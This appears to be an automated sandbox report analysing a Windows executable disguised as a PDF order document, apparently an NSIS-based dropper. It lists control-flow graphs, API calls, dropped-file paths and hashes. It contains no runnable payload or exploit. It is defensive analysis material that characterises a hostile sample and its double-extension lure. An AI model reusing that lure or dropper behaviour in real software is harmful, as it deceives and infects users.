4440->4442 4444 402634 4441->4444 4443 402646 lstrlenA 4442->4443 4443->4444 4445 405d14 WriteFile 4444->4445 4446 402668 4444->4446 4445->4446 4447 40272b 4448 402732 4447->4448 4450 4029aa 4447->4450 4449 402bac 17 API calls 4448->4449 4451 402739 4449->4451 4452 402748 SetFilePointer 4451->4452 4452->4450 4453 402758 4452->4453 4455 406032 wsprintfA 4453->4455 4455->4450 4456 401c2e 4457 402bac 17 API calls 4456->4457 4458 401c35 4457->4458 4459 402bac 17 API calls 4458->4459 4460 401c42 4459->4460 4461 401c57 4460->4461 4462 402bce 17 API calls 4460->4462 4463 401c67 4461->4463 4464 402bce 17 API calls 4461->4464 4462->4461 4465 401c72 4463->4465 4466 401cbe 4463->4466 4464->4463 4468 402bac 17 API calls 4465->4468 4467 402bce 17 API calls 4466->4467 4469 401cc3 4467->4469 4470 401c77 4468->4470 4471 402bce 17 API calls 4469->4471 4472 402bac 17 API calls 4470->4472 4473 401ccc FindWindowExA 4471->4473 4474 401c83 4472->4474 4477 401cea 4473->4477 4475 401c90 SendMessageTimeoutA 4474->4475 4476 401cae SendMessageA 4474->4476 4475->4477 4476->4477 4484 401e35 GetDC 4485 402bac 17 API calls 4484->4485 4486 401e47 GetDeviceCaps MulDiv ReleaseDC 4485->4486 4487 402bac 17 API calls 4486->4487 4488 401e78 4487->4488 4489 406167 17 API calls 4488->4489 4490 401eb5 CreateFontIndirectA 4489->4490 4491 402620 4490->4491 4492 402a35 SendMessageA 4493 402a4f InvalidateRect 4492->4493 4494 402a5a 4492->4494 4493->4494 3665 4057b6 ShellExecuteExA 4495 4014b7 4496 4014bd 4495->4496 4497 401389 2 API calls 4496->4497 4498 4014c5 4497->4498 3707 405339 3708 4054e4 3707->3708 3709 40535b GetDlgItem GetDlgItem GetDlgItem 3707->3709 3711 4054ec GetDlgItem CreateThread CloseHandle 3708->3711 3712 405514 3708->3712 3752 40418d SendMessageA 3709->3752 3711->3712 3755 4052cd 5 API calls 3711->3755 3714 405563 3712->3714 3715 40552a ShowWindow ShowWindow 3712->3715 3716 405542 3712->3716 3713 4053cb 3721 4053d2 GetClientRect GetSystemMetrics SendMessageA SendMessageA 3713->3721 3720 4041bf 8 API calls 3714->3720 3754 40418d SendMessageA 3715->3754 3717 40559d 3716->3717 3718 405552 3716->3718 3719 405576 ShowWindow 3716->3719 3717->3714 3729 4055aa SendMessageA 3717->3729 3723 404131 SendMessageA 3718->3723 3725 405596 3719->3725 3726 405588 3719->3726 3724 40556f 3720->3724 3727 405440 3721->3727 3728 405424 SendMessageA SendMessageA 3721->3728 3723->3714 3731 404131 SendMessageA 3725->3731 3730 4051fb 24 API calls 3726->3730 3732 405453 3727->3732 3733 405445 SendMessageA 3727->3733 3728->3727 3729->3724 3734 4055c3 CreatePopupMenu 3729->3734 3730->3725 3731->3717 3736 404158 18 API calls 3732->3736 3733->3732 3735 406167 17 API calls 3734->3735 3738 4055d3 AppendMenuA 3735->3738 3737 405463 3736->3737 3741 4054a0 GetDlgItem SendMessageA 3737->3741 3742 40546c ShowWindow 3737->3742 3739 4055f1 GetWindowRect 3738->3739 3740 405604 TrackPopupMenu 3738->3740 3739->3740 3740->3724 3743 405620 3740->3743 3741->3724 3746 4054c7 SendMessageA SendMessageA 3741->3746 3744 405482 ShowWindow 3742->3744 3745 40548f 3742->3745 3747 40563f SendMessageA 3743->3747 3744->3745 3753 40418d SendMessageA 3745->3753 3746->3724 3747->3747 3748 40565c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3747->3748 3750 40567e SendMessageA 3748->3750 3750->3750 3751 4056a0 GlobalUnlock SetClipboardData CloseClipboard 3750->3751 3751->3724 3752->3713 3753->3741 3754->3716 4499 402dba 4500 402de2 4499->4500 4501 402dc9 SetTimer 4499->4501 4502 402e37 4500->4502 4503 402dfc MulDiv wsprintfA SetWindowTextA SetDlgItemTextA 4500->4503 4501->4500 4503->4502 3777 4015bb 3778 402bce 17 API calls 3777->3778 3779 4015c2 3778->3779 3780 405b05 4 API calls 3779->3780 3781 4015ca 3780->3781 3782 401624 3781->3782 3783 405a97 CharNextA 3781->3783 3789 40573e 2 API calls 3781->3789 3791 40575b 5 API calls 3781->3791 3793 4015f3 3781->3793 3794 40160c GetFileAttributesA 3781->3794 3784 401652 3782->3784 3785 401629 3782->3785 3783->3781 3787 401423 24 API calls 3784->3787 3797 401423 3785->3797 3795 40164a 3787->3795 3789->3781 3791->3781 3792 40163b SetCurrentDirectoryA 3792->3795 3793->3781 3796 4056c1 4 API calls 3793->3796 3794->3781 3796->3793 3798 4051fb 24 API calls 3797->3798 3799 401431 3798->3799 3800 4060d4 lstrcpynA 3799->3800 3800->3792 4504 40493b 4505 404967 4504->4505 4506 40494b 4504->4506 4508 40499a 4505->4508 4509 40496d SHGetPathFromIDListA 4505->4509 4515 4057d4 GetDlgItemTextA 4506->4515 4511 404984 SendMessageA 4509->4511 4512 40497d 4509->4512 4510 404958 SendMessageA 4510->4505 4511->4508 4514 40140b 2 API calls 4512->4514 4514->4511 4515->4510 4516 4016bb 4517 402bce 17 API calls 4516->4517 4518 4016c1 GetFullPathNameA 4517->4518 4519 4016d8 4518->4519 4525 4016f9 4518->4525 4521 406448 2 API calls 4519->4521 4519->4525 4520 40170d GetShortPathNameA 4522 402a5a 4520->4522 4523 4016e9 4521->4523 4523->4525 4526 4060d4 lstrcpynA 4523->4526 4525->4520 4525->4522 4526->4525

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 0 403325-403364 SetErrorMode GetVersion 1 403366-40336e call 4064dd 0->1 2 403377 0->2 1->2 7 403370 1->7 4 40337c-40338f call 40646f lstrlenA 2->4 9 403391-4033ad call 4064dd * 3 4->9 7->2 16 4033be-40341c #17 OleInitialize SHGetFileInfoA call 4060d4 GetCommandLineA call 4060d4 9->16 17 4033af-4033b5 9->17 24 403428-40343d call 405a97 CharNextA 16->24 25 40341e-403423 16->25 17->16 21 4033b7 17->21 21->16 28 403502-403506 24->28 25->24 29 403442-403445 28->29 30 40350c 28->30 32 403447-40344b 29->32 33 40344d-403455 29->33 31 40351f-403539 GetTempPathA call 4032f4 30->31 42 403591-4035ab DeleteFileA call 402ea1 31->42 43 40353b-403559 GetWindowsDirectoryA lstrcatA call 4032f4 31->43 32->32 32->33 35 403457-403458 33->35 36 40345d-403460 33->36 35->36 37 4034f2-4034ff call 405a97 36->37 38 403466-40346a 36->38 37->28 57 403501 37->57 40 403482-4034af 38->40 41 40346c-403472 38->41 47 4034b1-4034b7 40->47 48 4034c2-4034f0 40->48 45 403474-403476 41->45 46 403478 41->46 60 4035b1-4035b7 42->60 61 40363f-40364f ExitProcess CoUninitialize 42->61 43->42 59 40355b-40358b GetTempPathA lstrcatA SetEnvironmentVariableA * 2 call 4032f4 43->59 45->40 45->46 46->40 52 4034b9-4034bb 47->52 53 4034bd 47->53 48->37 55 40350e-40351a call 4060d4 48->55 52->48 52->53 53->48 55->31 57->28 59->42 59->61 65 4035b9-4035c4 call 405a97 60->65 66 40362f-403636 call 4038e7 60->66 62 403773-403779 61->62 63 403655-403665 call 4057f0 ExitProcess 61->63 69 4037f5-4037fd 62->69 70 40377b-403794 GetCurrentProcess OpenProcessToken 62->70 80 4035c6-4035ef 65->80 81 4035fa-403604 65->81 73 40363b 66->73 75 403803-403807 ExitProcess 69->75 76 4037ff 69->76 78 4037c6-4037d4 call 4064dd 70->78 79 403796-4037c0 LookupPrivilegeValueA AdjustTokenPrivileges 70->79 73->61 76->75 90 4037e2-4037ec ExitWindowsEx 78->90 91 4037d6-4037e0 78->91 79->78 83 4035f1-4035f3 80->83 84 403606-403613 call 405b5a 81->84 85 40366b-40367f call 40575b lstrcatA 81->85 83->81 87 4035f5-4035f8 83->87 84->61 98 403615-40362b call 4060d4 * 2 84->98 96 403681-403687 lstrcatA 85->96 97 40368c-4036a6 lstrcatA lstrcmpiA 85->97 87->81 87->83 90->69 92 4037ee-4037f0 call 40140b 90->92 91->90 91->92 92->69 96->97 97->61 100 4036a8-4036ab 97->100 98->66 102 4036b4 call 40573e 100->102 103 4036ad-4036b2 call 4056c1 100->103 108 4036b9-4036c6 SetCurrentDirectoryA 102->108 103->108 111 4036d3-4036fb call 4060d4 108->111 112 4036c8-4036ce call 4060d4 108->112 116 403701-40371d call 406167 DeleteFileA 111->116 112->111 119 40375e-403765 116->119 120 40371f-40372f CopyFileA 116->120 119->116 121 403767-40376e call 405eb3 119->121 120->119 122 403731-403751 call 405eb3 call 406167 call 405773 120->122 121->61 122->119 131 403753-40375a CloseHandle 122->131 131->119
                                                                                                                                        APIs
                                                                                                                                        • SetErrorMode.KERNELBASE ref: 0040334A
                                                                                                                                        • GetVersion.KERNEL32 ref: 00403350
                                                                                                                                        • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 00403383
                                                                                                                                        • #17.COMCTL32(?,00000007,00000009,0000000B), ref: 004033BF
                                                                                                                                        • OleInitialize.OLE32(00000000), ref: 004033C6
                                                                                                                                        • SHGetFileInfoA.SHELL32(0079E528,00000000,?,00000160,00000000,?,00000007,00000009,0000000B), ref: 004033E2
                                                                                                                                        • GetCommandLineA.KERNEL32(Bysamfund,NSIS Error,?,00000007,00000009,0000000B), ref: 004033F7
                                                                                                                                        • CharNextA.USER32(00000000,"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe",00000020,"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe",00000000,?,00000007,00000009,0000000B), ref: 00403433
                                                                                                                                        • GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020,?,00000007,00000009,0000000B), ref: 00403530
                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000007,00000009,0000000B), ref: 00403541
                                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 0040354D
                                                                                                                                        • GetTempPathA.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000007,00000009,0000000B), ref: 00403561
                                                                                                                                        • lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 00403569
                                                                                                                                        • SetEnvironmentVariableA.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000007,00000009,0000000B), ref: 0040357A
                                                                                                                                        • SetEnvironmentVariableA.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000007,00000009,0000000B), ref: 00403582
                                                                                                                                        • DeleteFileA.KERNELBASE(1033,?,00000007,00000009,0000000B), ref: 00403596
                                                                                                                                          • Part of subcall function 004064DD: GetModuleHandleA.KERNEL32(?,?,?,00403398,0000000B), ref: 004064EF
                                                                                                                                          • Part of subcall function 004064DD: GetProcAddress.KERNEL32(00000000,?), ref: 0040650A
                                                                                                                                          • Part of subcall function 004038E7: lstrlenA.KERNEL32(: Completed,?,?,?,: Completed,00000000,C:\Users\user\AppData\Roaming\skittaget\lektier,1033,0079F568,80000001,Control Panel\Desktop\ResourceLocale,00000000,0079F568,00000000,00000002,74DF3410), ref: 004039D7
                                                                                                                                          • Part of subcall function 004038E7: lstrcmpiA.KERNEL32(?,.exe), ref: 004039EA
                                                                                                                                          • Part of subcall function 004038E7: GetFileAttributesA.KERNEL32(: Completed), ref: 004039F5
                                                                                                                                          • Part of subcall function 004038E7: LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\AppData\Roaming\skittaget\lektier), ref: 00403A3E
                                                                                                                                          • Part of subcall function 004038E7: RegisterClassA.USER32(007A2700), ref: 00403A7B
                                                                                                                                        • ExitProcess.KERNEL32(?,?,00000007,00000009,0000000B), ref: 0040363F
                                                                                                                                          • Part of subcall function 0040380D: CloseHandle.KERNEL32(FFFFFFFF,00403644,?,?,00000007,00000009,0000000B), ref: 00403818
                                                                                                                                        • CoUninitialize.COMBASE(?,?,00000007,00000009,0000000B), ref: 00403644
                                                                                                                                        • ExitProcess.KERNEL32 ref: 00403665
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000028,?,00000007,00000009,0000000B), ref: 00403782
                                                                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 00403789
                                                                                                                                        • LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004037A1
                                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,?,?,?,00000000,?,00000000,00000000,00000000), ref: 004037C0
                                                                                                                                        • ExitWindowsEx.USER32(00000002,80040002), ref: 004037E4
                                                                                                                                        • ExitProcess.KERNEL32 ref: 00403807
                                                                                                                                          • Part of subcall function 004057F0: MessageBoxIndirectA.USER32(0040A218), ref: 0040584B
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Process$Exit$File$EnvironmentHandlePathTempTokenVariableWindowslstrcatlstrlen$AddressAdjustAttributesCharClassCloseCommandCurrentDeleteDirectoryErrorImageIndirectInfoInitializeLineLoadLookupMessageModeModuleNextOpenPrivilegePrivilegesProcRegisterUninitializeValueVersionlstrcmpi
                                                                                                                                        • String ID: Clona $$"$"C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe"$(y$.tmp$1033$Bysamfund$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\skittaget\lektier$C:\Users\user\AppData\Roaming\skittaget\lektier\Genetableringernes111$C:\Users\user\Desktop$C:\Users\user\Desktop\Order requirements CIF Greece_pdf.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$`Kt$~nsu
                                                                                                                                        • API String ID: 562314493-648828614
                                                                                                                                        • Opcode ID: c6efd9576a15a3db99a394e629bd7df9bb1422e4c33da2c05e76913c41e6651f
                                                                                                                                        • Instruction ID: 97d63beb8df843ca38620017436ed0801945ee3064957e10bbaedf14490df2b6
                                                                                                                                        • Opcode Fuzzy Hash: c6efd9576a15a3db99a394e629bd7df9bb1422e4c33da2c05e76913c41e6651f
                                                                                                                                        • Instruction Fuzzy Hash: B6C1F7705047816ED7216F759D89A2F3EACAB86306F05453EF182B61D2CB7C8A15CB2F

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 132 405339-405355 133 4054e4-4054ea 132->133 134 40535b-405422 GetDlgItem * 3 call 40418d call 404a7e GetClientRect GetSystemMetrics SendMessageA * 2 132->134 136 405514-405520 133->136 137 4054ec-40550e GetDlgItem CreateThread CloseHandle 133->137 156 405440-405443 134->156 157 405424-40543e SendMessageA * 2 134->157 139 405542-405548 136->139 140 405522-405528 136->140 137->136 144 40554a-405550 139->144 145 40559d-4055a0 139->145 142 405563-40556a call 4041bf 140->142 143 40552a-40553d ShowWindow * 2 call 40418d 140->143 153 40556f-405573 142->153 143->139 146 405552-40555e call 404131 144->146 147 405576-405586 ShowWindow 144->147 145->142 150 4055a2-4055a8 145->150 146->142 154 405596-405598 call 404131 147->154 155 405588-405591 call 4051fb 147->155 150->142 158 4055aa-4055bd SendMessageA 150->158 154->145 155->154 161 405453-40546a call 404158 156->161 162 405445-405451 SendMessageA 156->162 157->156 163 4055c3-4055ef CreatePopupMenu call 406167 AppendMenuA 158->163 164 4056ba-4056bc 158->164 171 4054a0-4054c1 GetDlgItem SendMessageA 161->171 172 40546c-405480 ShowWindow 161->172 162->161 169 4055f1-405601 GetWindowRect 163->169 170 405604-40561a TrackPopupMenu 163->170 164->153 169->170 170->164 173 405620-40563a 170->173 171->164 176 4054c7-4054df SendMessageA * 2 171->176 174 405482-40548d ShowWindow 172->174 175 40548f 172->175 177 40563f-40565a SendMessageA 173->177 178 405495-40549b call 40418d 174->178 175->178 176->164 177->177 179 40565c-40567c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 177->179 178->171 181 40567e-40569e SendMessageA 179->181 181->181 182 4056a0-4056b4 GlobalUnlock SetClipboardData CloseClipboard 181->182 182->164
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,00000403), ref: 00405398
                                                                                                                                        • GetDlgItem.USER32(?,000003EE), ref: 004053A7
                                                                                                                                        • GetClientRect.USER32(?,?), ref: 004053E4
                                                                                                                                        • GetSystemMetrics.USER32(00000002), ref: 004053EB
                                                                                                                                        • SendMessageA.USER32(?,0000101B,00000000,?), ref: 0040540C
                                                                                                                                        • SendMessageA.USER32(?,00001036,00004000,00004000), ref: 0040541D
                                                                                                                                        • SendMessageA.USER32(?,00001001,00000000,?), ref: 00405430
                                                                                                                                        • SendMessageA.USER32(?,00001026,00000000,?), ref: 0040543E
                                                                                                                                        • SendMessageA.USER32(?,00001024,00000000,?), ref: 00405451
                                                                                                                                        • ShowWindow.USER32(00000000,?,0000001B,?), ref: 00405473
                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405487
                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004054A8
                                                                                                                                        • SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004054B8
                                                                                                                                        • SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004054D1
                                                                                                                                        • SendMessageA.USER32(00000000,00002001,00000000,?), ref: 004054DD
                                                                                                                                        • GetDlgItem.USER32(?,000003F8), ref: 004053B6
                                                                                                                                          • Part of subcall function 0040418D: SendMessageA.USER32(00000028,?,00000001,00403FBD), ref: 0040419B
                                                                                                                                        • GetDlgItem.USER32(?,000003EC), ref: 004054F9
                                                                                                                                        • CreateThread.KERNELBASE(00000000,00000000,Function_000052CD,00000000), ref: 00405507
                                                                                                                                        • CloseHandle.KERNELBASE(00000000), ref: 0040550E
                                                                                                                                        • ShowWindow.USER32(00000000), ref: 00405531
                                                                                                                                        • ShowWindow.USER32(?,00000008), ref: 00405538
                                                                                                                                        • ShowWindow.USER32(00000008), ref: 0040557E
                                                                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004055B2
                                                                                                                                        • CreatePopupMenu.USER32 ref: 004055C3
                                                                                                                                        • AppendMenuA.USER32(00000000,00000000,00000001,00000000), ref: 004055D8
                                                                                                                                        • GetWindowRect.USER32(?,000000FF), ref: 004055F8
                                                                                                                                        • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405611
                                                                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040564D
                                                                                                                                        • OpenClipboard.USER32(00000000), ref: 0040565D
                                                                                                                                        • EmptyClipboard.USER32 ref: 00405663
                                                                                                                                        • GlobalAlloc.KERNEL32(00000042,?), ref: 0040566C
                                                                                                                                        • GlobalLock.KERNEL32(00000000), ref: 00405676
                                                                                                                                        • SendMessageA.USER32(?,0000102D,00000000,?), ref: 0040568A
                                                                                                                                        • GlobalUnlock.KERNEL32(00000000), ref: 004056A3
                                                                                                                                        • SetClipboardData.USER32(00000001,00000000), ref: 004056AE
                                                                                                                                        • CloseClipboard.USER32 ref: 004056B4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 590372296-0
                                                                                                                                        • Opcode ID: dee1dd70bc3dae44c318a2559c0bf59ef3862208e7b388c7693d8967826c8269
                                                                                                                                        • Instruction ID: 684cfb1aaa76551445c09ef43b39d8f4d2da16edc43e4b0a600a882252a292b3
                                                                                                                                        • Opcode Fuzzy Hash: dee1dd70bc3dae44c318a2559c0bf59ef3862208e7b388c7693d8967826c8269
                                                                                                                                        • Instruction Fuzzy Hash: 4AA16C70900608BFDF119FA4DD89EAE7B79FB48354F00802AFA45BA1A1C7794E51DF58
                                                                                                                                        APIs
                                                                                                                                        • FindFirstFileA.KERNELBASE(74DF3410,007A0DB8,007A0970,00405B9D,007A0970,007A0970,00000000,007A0970,007A0970,74DF3410,?,C:\Users\user\AppData\Local\Temp\,004058BC,?,74DF3410,C:\Users\user\AppData\Local\Temp\), ref: 00406453
                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 0040645F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000000.00000002.1696648600.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000000.00000002.1696632412.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696668210.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.000000000077B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000781000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000785000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.0000000000787000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007A9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1696689935.00000000007BB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        • Associated: 00000000.00000002.1697251991.00000000007BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_0_2_400000_Order requirements CIF Greece_pdf.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2295610775-0
                                                                                                                                        • Opcode ID: e2f3e8573fc2909bb7a973f29d8235fa37fadc60103d57d1e27243d25dce126e
                                                                                                                                        • Instruction ID: 7d3207d9493d68405b9bf293567bde81a359e03289c7d5d361232287f2b34f21
                                                                                                                                        • Opcode Fuzzy Hash: e2f3e8573fc2909bb7a973f29d8235fa37fadc60103d57d1e27243d25dce126e
                                                                                                                                        • Instruction Fuzzy Hash: B7D01235504620ABC3405B78AD0C88B7A589F563313218F36F46AF12E0C6748C638ADD

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 183 403c84-403c96 184 403dd7-403de6 183->184 185 403c9c-403ca2 183->185 187 403e35-403e4a 184->187 188 403de8-403e30 GetDlgItem * 2 call 404158 SetClassLongA call 40140b 184->188 185->184 186 403ca8-403cb1 185->186 191 403cb3-403cc0 SetWindowPos 186->191 192 403cc6-403cc9 186->192 189 403e8a-403e8f call 4041a4 187->189 190 403e4c-403e4f 187->190 188->187 202 403e94-403eaf 189->202 194 403e51-403e5c call 401389 190->194 195 403e82-403e84 190->195 191->192 197 403ce3-403ce9 192->197 198 403ccb-403cdd ShowWindow 192->198 194->195 216 403e5e-403e7d SendMessageA 194->216 195->189 201 404125 195->201 203 403d05-403d08 197->203 204 403ceb-403d00 DestroyWindow 197->204 198->197 209 404127-40412e 201->209 207 403eb1-403eb3 call 40140b 202->207 208 403eb8-403ebe 202->208 212 403d0a-403d16 SetWindowLongA 203->212 213 403d1b-403d21 203->213 210 404102-404108 204->210 207->208 219 4040e3-4040fc DestroyWindow KiUserCallbackDispatcher 208->219 220 403ec4-403ecf 208->220 210->201 218 40410a-404110 210->218 212->209 214 403dc4-403dd2 call 4041bf 213->214 215 403d27-403d38 GetDlgItem 213->215 214->209 221 403d57-403d5a 215->221 222 403d3a-403d51 SendMessageA IsWindowEnabled 215->222 216->209 218->201 224 404112-40411b ShowWindow 218->224 219->210 220->219 225 403ed5-403f22 call 406167 call 404158 * 3 GetDlgItem 220->225 226 403d5c-403d5d 221->226 227 403d5f-403d62 221->227 222->201 222->221 224->201 253 403f24-403f29 225->253 254 403f2c-403f68 ShowWindow KiUserCallbackDispatcher call 40417a EnableWindow 225->254 230 403d8d-403d92 call 404131 226->230 231 403d70-403d75 227->231 232 403d64-403d6a 227->232 230->214 235 403dab-403dbe SendMessageA 231->235 237 403d77-403d7d 231->237 232->235 236 403d6c-403d6e 232->236 235->214 236->230 241 403d94-403d9d call 40140b 237->241 242 403d7f-403d85 call 40140b 237->242 241->214 250 403d9f-403da9 241->250 251 403d8b 242->251 250->251 251->230 253->254 257 403f6a-403f6b 254->257 258 403f6d 254->258 259 403f6f-403f9d GetSystemMenu EnableMenuItem SendMessageA 257->259 258->259 260 403fb2 259->260 261 403f9f-403fb0 SendMessageA 259->261 262 403fb8-403ff2 call 40418d call 403c65 call 4060d4 lstrlenA call 406167 SetWindowTextA call 401389 260->262 261->262 262->202 273 403ff8-403ffa 262->273 273->202 274 404000-404004 273->274 275 404023-404037 DestroyWindow 274->275 276 404006-40400c 274->276 275->210 277 40403d-40406a CreateDialogParamA 275->277 276->201 278 404012-404018 276->278 277->210 279 404070-4040c7 call 404158 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 277->279 278->202 280 40401e 278->280 279->201 285 4040c9-4040dc ShowWindow call 4041a4 279->285 280->201 287 4040e1 285->287 287->210
                                                                                                                                        APIs
                                                                                                                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403CC0
                                                                                                                                        • ShowWindow.USER32(?), ref: 00403CDD
                                                                                                                                        • DestroyWindow.USER32 ref: 00403CF1
                                                                                                                                        • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403D0D
                                                                                                                                        • GetDlgItem.USER32(?,?), ref: 00403D2E
                                                                                                                                        • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403D42
